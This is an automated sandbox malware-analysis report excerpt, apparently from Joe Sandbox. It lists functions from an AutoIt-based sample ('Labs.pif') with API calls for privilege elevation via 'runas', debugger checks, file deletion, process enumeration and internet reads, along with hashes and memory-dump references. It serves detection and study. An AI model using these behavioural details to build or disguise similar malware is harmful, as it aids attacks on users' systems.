Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94

Function 00403B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
GlobalFree.KERNEL32(00000000), ref: 00403B7F

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B5E

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8

Function 00405E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E42
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E52

Strings

C:\Users\user\Desktop, xrefs: 00405E3C

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC

Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

Analysis Process: Labs.pifPID: 7244, Parent PID: 2080COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	89

Executed Functions

Function 00785240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
IsDebuggerPresent.KERNEL32 ref: 0078527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Part of subcall function 0077BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 007C0B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 007C0B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00826D10), ref: 007C0BE9
ShellExecuteW.SHELL32(00000000), ref: 007C0BF0

Part of subcall function 0078514C: GetSysColorBrush.USER32(0000000F), ref: 00785156
Part of subcall function 0078514C: LoadCursorW.USER32(00000000,00007F00), ref: 00785165
Part of subcall function 0078514C: LoadIconW.USER32(00000063), ref: 0078517C
Part of subcall function 0078514C: LoadIconW.USER32(000000A4), ref: 0078518E
Part of subcall function 0078514C: LoadIconW.USER32(000000A2), ref: 007851A0
Part of subcall function 0078514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
Part of subcall function 0078514C: RegisterClassExW.USER32(?), ref: 0078521C

Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
Part of subcall function 007850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 0078513E
Part of subcall function 007850DB: ShowWindow.USER32(00000000), ref: 00785147

Part of subcall function 007859D3: _memset.LIBCMT ref: 007859F9
Part of subcall function 007859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 007C0B28
runas, xrefs: 007C0BE4
AutoIt, xrefs: 007C0B23

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 833efa50b1b3335e877440b668ca58eda1a230d050aaef767ef53ff0202f381b
Instruction ID: 61dd8488185bbfc0ae55466bd263fc3d1c5def3d208957b4d1b7e0918c93dba9
Opcode Fuzzy Hash: 833efa50b1b3335e877440b668ca58eda1a230d050aaef767ef53ff0202f381b
Instruction Fuzzy Hash: 6F514A7098424CEACF21FBB4DC0AEEE7B79FF45340F1040A9F452A2262CA7C9945CB61

Function 00785D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00785D40

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

GetCurrentProcess.KERNEL32(?,00800A18,00000000,00000000,?), ref: 00785E07
IsWow64Process.KERNEL32(00000000), ref: 00785E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00785E54
FreeLibrary.KERNEL32(00000000), ref: 00785E5F
GetSystemInfo.KERNEL32(00000000), ref: 00785E90
GetSystemInfo.KERNEL32(00000000), ref: 00785E9C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
Instruction ID: 147d5a72fddc3018f3d158741b0eb6658741c73d72dc6ad6381e26a54988cb51
Opcode Fuzzy Hash: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
Instruction Fuzzy Hash: E791B631589BC4DEC731DB7884505ABFFE5BF2A300F884A9ED0C797A42D238A548D769

Function 007D4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4

Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED

FindFirstFileW.KERNEL32(?,?), ref: 007D407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D40DD
FindClose.KERNEL32(00000000), ref: 007D40F4
FindClose.KERNEL32(00000000), ref: 007D40FD

Strings

\*.*, xrefs: 007D404E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 77735f80899b77f3f37ddb181fca733d6984b1ae3c25e8a3a26b3011367535d5
Instruction ID: 76ed7656cd91326057f129d55bd1a7478e51231739a255cfb2830c6853eb18b9
Opcode Fuzzy Hash: 77735f80899b77f3f37ddb181fca733d6984b1ae3c25e8a3a26b3011367535d5
Instruction Fuzzy Hash: 33316331048385DFC701FB60D8999AFB7ECBE95304F444A5EF5E582291DB39D909CBA2

Function 007D4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
Process32NextW.KERNEL32(00000000,?), ref: 007D419B
FindCloseChangeNotification.KERNEL32(00000000), ref: 007D4245

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
Instruction ID: c57331a14f5e08afee9f31eba3314cd102b996f49715970149f9a8743eddf177
Opcode Fuzzy Hash: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
Instruction Fuzzy Hash: 64314D71148341DBD304EF50E889AAEBBF8BF95350F40052EF585822A1EB75AA49CB92

Function 0077B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00783740: CharUpperBuffW.USER32(?,008371DC,00000001,?,00000000,008371DC,?,007753A5,?,?,?,?), ref: 0078375D

_memmove.LIBCMT ref: 0077B68A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 0f65732929f9a67fe889ad2ff69f7a059c3c3ad3d8f67df1b9a2eb4270217fea
Instruction ID: b02512a2b423c2efd75704f40639f36570d0554f1009476dffd5d349046a49c2
Opcode Fuzzy Hash: 0f65732929f9a67fe889ad2ff69f7a059c3c3ad3d8f67df1b9a2eb4270217fea
Instruction Fuzzy Hash: 82A26870608741DFDB20DF28C484B6AB7E1BF88344F14895DE89A8B361D779ED85CB92

Function 007E29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007E2AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E2AE4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 11041ac1bc76f16def4591836cf144219df631fcdf29292d6f498499cac976aa
Instruction ID: 75993a0a0cca3978998a533dc3406ad855c03f9f3956ae3f91e7a9b9d9233be1
Opcode Fuzzy Hash: 11041ac1bc76f16def4591836cf144219df631fcdf29292d6f498499cac976aa
Instruction Fuzzy Hash: 90412971605249FFEB20DE56DC85EBB73BCEB44314F10806AFA01A3142E6799E429B60

Function 007D494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007BFC86), ref: 007D495A
FindFirstFileW.KERNEL32(?,?), ref: 007D496B
FindClose.KERNEL32(00000000), ref: 007D497B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
Instruction ID: 134cdb7df7a19620caa099a50b949946d33bd7e1f8b84dad8fb6a7cf48c022e7
Opcode Fuzzy Hash: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
Instruction Fuzzy Hash: 5CE0DF31810505ABC3206738EC0D9EA776CAF06339F200706F835C22E0EB74A9448AD6

Function 0077BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0077BF57

Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6

Sleep.KERNEL32(0000000A,?,?), ref: 007B36B5

Strings

@TRAY_ID, xrefs: 007B3FCD
@GUI_WINHANDLE, xrefs: 007B37C1
@GUI_CTRLHANDLE, xrefs: 007B3816
@COM_EVENTOBJ, xrefs: 007B3D2E
CALL, xrefs: 0077C277
@GUI_CTRLID, xrefs: 007B376C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 22fa4d543df3b6933c9ff9265af9f44d886b216ba55dce1b660c52dc0aecae05
Instruction ID: 1bbdaa1e824385f5dd14af696994e1fd1f14d6fd706a6cfc35e0b64f23d61a2b
Opcode Fuzzy Hash: 22fa4d543df3b6933c9ff9265af9f44d886b216ba55dce1b660c52dc0aecae05
Instruction Fuzzy Hash: 23C2D470608341DFDB24DF24C848BAAB7E5FF84344F14891DF58A972A1DB79E984CB92

Function 007733E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00773444
RegisterClassExW.USER32(00000030), ref: 0077346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
InitCommonControlsEx.COMCTL32(?), ref: 0077349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
LoadIconW.USER32(000000A9), ref: 007734C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1

Strings

AutoIt v3 GUI, xrefs: 00773460
0, xrefs: 00773426
+, xrefs: 0077342D
TaskbarCreated, xrefs: 00773474

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
Instruction ID: dee2a5e093b451685737f166ca2b4923e7535ac82242a2d80646c2d71a18ccb2
Opcode Fuzzy Hash: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
Instruction Fuzzy Hash: 0C314AB1904309AFDB508FA4DC89BDDBBF0FF08310F10452AE555E62A0D7BA5645CF90

Function 00773411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00773444
RegisterClassExW.USER32(00000030), ref: 0077346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
InitCommonControlsEx.COMCTL32(?), ref: 0077349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
LoadIconW.USER32(000000A9), ref: 007734C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1

Strings

AutoIt v3 GUI, xrefs: 00773460
0, xrefs: 00773426
+, xrefs: 0077342D
TaskbarCreated, xrefs: 00773474

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
Instruction ID: ab4f0fb1768940948c0034b6251d5e6ea1184a2a39cf6659d66a9f3f7e5671c8
Opcode Fuzzy Hash: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
Instruction Fuzzy Hash: 1A21E3B1904218AFEB509FA4EC89B9EBBF4FB08710F00852AFA15A62A0D7B55544CF95

Function 00782FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00783094), ref: 007900ED

Part of subcall function 007908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0078309F), ref: 007908E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007830E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C01BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C01FB
RegCloseKey.ADVAPI32(?), ref: 007C0239
_wcscat.LIBCMT ref: 007C0292

Strings

\Include\, xrefs: 0078309F
\, xrefs: 007C02B5
Software\AutoIt v3\AutoIt, xrefs: 007830D8
Include, xrefs: 007C01B1, 007C01F2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
